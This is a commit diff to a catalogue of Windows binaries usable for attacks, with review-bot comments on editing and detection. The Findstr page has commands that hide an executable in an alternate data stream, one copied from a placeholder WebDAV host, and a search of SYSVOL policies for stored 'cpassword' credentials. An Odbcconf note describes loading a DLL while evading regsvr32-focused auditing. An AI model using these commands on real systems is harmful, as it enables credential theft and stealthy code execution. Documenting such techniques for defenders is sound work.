Added and adjusted
parent
d3403eae69
commit
dea250c754
|
@ -0,0 +1 @@
|
||||||
|
"notes.txt"
|
|
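Review bot: the new one-line notes.txt carries no information a reader of the repository can use; its only visible content is the string "notes.txt", so it reads as a scratch file that was committed by accident. Either drop it from this commit or state in the commit message (currently just "Added and adjusted") what the file is for, since the rest of the commit is documentation changes to README.md and the OSBinaries pages.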
@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
|
||||||
|
|
||||||
## Binary.exe
|
## Binary.exe
|
||||||
|
|
||||||
* Functions: Execute
|
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search
|
||||||
|
|
||||||
```
|
```
|
||||||
Example
|
Example
|
||||||
|
|
|
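Review bot: the expanded template line "* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search" now defines the vocabulary contributors should pick from, but it is not consistent with the Findstr page changed in this same commit, which uses "Add ADS" rather than "Write ADS". Pick one term for writing to an alternate data stream and use it in both places, otherwise the per-binary pages and the template will keep diverging and a later search across pages by function name will miss entries.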
@ -40,6 +40,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Regasm.exe](OSBinaries/Regasm.md)
|
[Regasm.exe](OSBinaries/Regasm.md)
|
||||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||||
|
[Robocopy.exe](OSBinaries/Robocopy.md)
|
||||||
[Replace.exe](OSBinaries/Replace.md)
|
[Replace.exe](OSBinaries/Replace.md)
|
||||||
[Rundll32.exe](OSBinaries/Rundll32.md)
|
[Rundll32.exe](OSBinaries/Rundll32.md)
|
||||||
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
|
||||||
|
|
|
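Review bot: the new "[Robocopy.exe](OSBinaries/Robocopy.md)" entry is inserted between Regsvr32.exe and Replace.exe, which breaks the alphabetical order of the surrounding list (Regasm, Regsvcs, Regsvr32, Replace, Rundll32, Runscripthelper); it belongs after Replace.exe and before Rundll32.exe. Also note that the page this links to is added in this same commit as an unfilled template, so the README is advertising a page that has no example yet.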
@ -1,11 +1,13 @@
|
||||||
## Findstr.exe
|
## Findstr.exe
|
||||||
|
|
||||||
* Functions: Add ADS
|
* Functions: Add ADS, Search
|
||||||
|
|
||||||
```
|
```
|
||||||
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
|
|
||||||
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
|
||||||
|
|
||||||
|
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
|
|
|
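Review bot: the new example "findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml" justifies the "Search" function added to the Functions line, but nothing on the page explains it: the two existing examples write a file into an alternate data stream, while this one recursively searches Group Policy XML under the domain's SYSVOL share for the cpassword attribute, and a reader cannot tell that from the command alone. Add a line under Notes saying what it searches for and why that matters to defenders (SYSVOL read access is available to every domain user, so this is worth monitoring on share access logs), add the source to Acknowledgements or Resources, and state that <FQDN> is the domain name placeholder.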
@ -16,6 +16,7 @@ Code sample:
|
||||||
Resources:
|
Resources:
|
||||||
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
* https://github.com/woanware/application-restriction-bypasses
|
* https://github.com/woanware/application-restriction-bypasses
|
||||||
|
* https://twitter.com/subTee/status/789459826367606784
|
||||||
|
|
||||||
Full path:
|
Full path:
|
||||||
```
|
```
|
||||||
|
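Review bot: the added resource "https://twitter.com/subTee/status/789459826367606784" is a bare URL with no label, and the Notes section of this same file is being rewritten around the text of that tweet. Since tweets disappear, give the entry a short description (what it shows, for example the response-file based DLL load mentioned in the Notes) so the list stays useful even if the link goes dead.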
@ -24,6 +25,9 @@ c:\windows\sysWOW64\odbcconf.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
Notes:
|
Notes:
|
||||||
Samples can be found in the resources.
|
Text from @subtee tweet:
|
||||||
|
```
|
||||||
|
Loads Dll from path in my.rsp.
|
||||||
|
Hide from command line auditing watching for regsvr32
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
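Review bot: the removed line "Samples can be found in the resources." is still true after this change (the Resources list above still carries the samples) and should be kept rather than replaced by the quote. The quoted tweet text "Loads Dll from path in my.rsp." refers to a response file that the page never shows, so a reader cannot see what my.rsp contains or how it is passed to odbcconf.exe; either add the response file and the invocation to the example block or point to which resource has them. The second quoted line, "Hide from command line auditing watching for regsvr32", is worth restating as a detection note in the page's own words: the DLL load happens through odbcconf.exe rather than regsvr32.exe, so rules keyed only on regsvr32 command lines will not see it, and odbcconf.exe command lines and its DLL loads need to be covered as well.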
@ -0,0 +1,28 @@
|
||||||
|
## Robocopy.exe
|
||||||
|
|
||||||
|
* Functions: Copy
|
||||||
|
|
||||||
|
```
|
||||||
|
Robocopy.exe - Needs example
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Name of guy - @twitterhandle
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://linktosomethingusefull.com
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\binary.exe
|
||||||
|
c:\windows\sysWOW64\binary.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Some specific details about the binary file.
|
||||||
|
|
||||||
|
|
||||||
|
|
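Review bot: this new Robocopy.md is the unfilled page template, not a finished entry: the example block still reads "Robocopy.exe - Needs example", Acknowledgements has "Name of guy - @twitterhandle", Code sample has "[NameOfLink](Payload/NameOfPayload)", Resources has "https://linktosomethingusefull.com", Notes has "Some specific details about the binary file.", and the Full path block lists c:\windows\system32\binary.exe and c:\windows\sysWOW64\binary.exe instead of the robocopy.exe paths. At minimum, fix the two Full path lines and delete the placeholder acknowledgement, code sample and resource entries so nothing on the page is fabricated; better, hold the file (and the README link added in this commit) until a real Copy example exists.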